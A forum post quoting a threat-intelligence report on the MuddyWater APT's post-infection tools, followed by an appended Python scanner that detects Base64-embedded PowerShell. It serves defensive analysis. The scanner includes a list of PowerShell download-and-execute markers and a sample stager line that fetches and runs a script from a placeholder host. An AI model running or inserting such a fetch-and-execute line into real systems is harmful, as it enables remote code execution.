02 May 19, 15:58
Quote:
Introduction
MuddyWater is an APT with a focus on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and also a few other countries in nearby regions (Azerbaijan, Pakistan and Afghanistan).
MuddyWater first surfaced in 2017 and has been active continuously, targeting a large number of organizations. First stage infections and graphical decoys have been described by multiple sources, including in our previous research: “MuddyWater expands operations”.
Nevertheless, comprehensive details of what happens after the initial infection by MuddyWater have not previously been made publicly available. MuddyWater attackers deploy a variety of tools and techniques, mostly developed by the group itself in Python, C# and PowerShell, to implement their attacks and complete their victim infiltration and data exfiltration. Examples of such tools include multiple download/execute tools and RATs in C# and Python, SSH Python script, multiple Python tools for extraction of credentials, history and more.
This report details a collection of tools used by this threat actor on its targets after initial infection. It also details deceptive techniques used to divert investigations once attack tools have been deployed inside victim systems (such as Chinese strings, Russian strings and impersonation of the “RXR Saudi Arabia” hacking group). The investigation revealed additional OPSEC mistakes by the attackers, but we are not detailing those here due to ongoing law enforcement investigations.
Attackers’ toolset analysis
During our research on MuddyWater campaigns, we were able to identify a number of tools and scripts used by this actor, providing a good understanding of this actor’s abilities. Most of the tools used are custom developed, while others are based on more generic and publicly available ones.
The list includes:
* Nihay – C# Download-and-Execute tool
* LisfonService – C# RAT
* Client.py – Python RAT
* Client-win.py – SSH Python script
* Rc.py/Rc.exe – Basic Python RAT
* VBScript and VBA files
* Third-party scripts (Muddy, Losi Boomber, Slaver reverse tunnel…)
* Second stage PowerShell scripts
Most of these tools are scripts written in Python or PowerShell. We noticed that MuddyWater compiles various offensive Python scripts into executables for portability, using Py2Exe and PyInstaller for this task. This includes Python scripts such as “CrackMapExec”, “shootback” and “Lazagne”.
We have also noticed the use of “PS2EXE” to convert PowerShell scripts into executables, with the original PowerShell code embedded as a Base64-encoded string. In other cases, we have noticed a preference for using PowerShell Reflective DLL injection to deploy Metasploit Stageless Meterpreters. They use both 32-Bit and 64-Bit versions. Usually, the Stageless Meterpreter has the “Ext_server_stdapi.x64.dll”, “Ext_server_extapi.x64.dll”, and “Ext_server_espia.x64.dll” extensions.
Nihay – C# Download-and-Execute tool
The tool called “Nihay” (as per its Pdb) is a basic “Download-and-Execute” Trojan written in C#. It downloads a PowerShell one-liner from a hardcoded URL (for instance, https://beepaste[.]io/view/raw/pPCMo1) and passes it to “cmd.exe /c”.
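As an added, defender-side triage example (not code from the report or from the forum post): a small Python scanner that finds long Base64 runs inside a file and flags those that decode to PowerShell-like text, the layout described above for PS2EXE-converted executables. The marker list, the 64-character threshold, the UTF-8 assumption and the sample binary are constructed assumptions, not values taken from the report.

```python
import base64
import re
from typing import List, Optional

# Triage heuristic (assumption): a decoded blob containing several of these
# tokens is far more likely to be a PowerShell script than random data.
POWERSHELL_MARKERS = (
    "Invoke-Expression", "IEX", "New-Object", "Net.WebClient", "DownloadString",
    "Start-Process", "-EncodedCommand", "$env:",
)
# Runs of the Base64 alphabet at least 64 chars long, with optional padding.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def _mostly_text(s: str) -> bool:
    """True if at least 95% of the characters are printable or whitespace."""
    ok = sum(ch.isprintable() or ch in "\r\n\t" for ch in s)
    return len(s) > 0 and ok / len(s) >= 0.95


def decode_candidate(blob: bytes) -> Optional[str]:
    """Decode one Base64 run; return text only if it decodes cleanly as UTF-8."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # bad padding/length or not text
        return None
    return text if _mostly_text(text) else None


def find_embedded_powershell(data: bytes, min_hits: int = 2) -> List[dict]:
    """Return every Base64 run in `data` that decodes to PowerShell-like text."""
    findings = []
    for m in _B64_RUN.finditer(data):
        text = decode_candidate(m.group(0))
        if text is None:
            continue
        lowered = text.lower()
        hits = sorted(mk for mk in POWERSHELL_MARKERS if mk.lower() in lowered)
        if len(hits) >= min_hits:
            findings.append({"offset": m.start(), "markers": hits, "text": text})
    return findings


# Constructed sample: a fake PE prefix with a Base64-encoded stager embedded,
# mimicking the PS2EXE layout described above. The URL is a placeholder.
SAMPLE_SCRIPT = (
    "$c = New-Object Net.WebClient\n"
    "IEX $c.DownloadString('http://example.invalid/stage2.ps1')\n"
)
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 40 + b"ps2exe-host-stub\x00"
    + base64.b64encode(SAMPLE_SCRIPT.encode()) + b"\x00" * 16
)
```

Run it over the raw bytes of a suspect file; a hit is a lead for manual review of the decoded text, not a verdict on its own.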